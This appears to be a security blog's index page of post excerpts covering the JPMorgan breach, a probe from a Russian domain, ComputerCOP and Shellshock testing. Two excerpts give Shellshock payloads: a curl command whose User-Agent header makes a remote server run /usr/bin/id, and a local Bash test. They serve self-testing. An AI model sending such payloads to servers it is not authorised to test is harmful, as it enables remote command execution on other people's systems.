What happened to JP Morgan hack of 76 mil accounts?
Wall street Journal has the story behind their paywall. In mid-June hackers attacked and gained access to servers and data. 2 months go by and JPMorgan defense does not know…
Defend Your Systems
Wall street Journal has the story behind their paywall. In mid-June hackers attacked and gained access to servers and data. 2 months go by and JPMorgan defense does not know…
it looks like www.oversitesentry got probed yesterday over 46506 hits. (normal is in the thousands or hundreds, not tens of thousands. and it all originated from ‘tryal.ru’ I suspect it…
There is a program that some law enforcement agencies have given to families across the country It is called ComputerCOP. The EFF (Electronic Frontier Foundation) has reviewed and analyzed the…
Use commands to test remote sites: curl -A “() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id” $URL I did it to my website (www.fixvirus.com) obviously…
how to test for vulnerable Bash shell: Execute the following: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" on the command line, if it…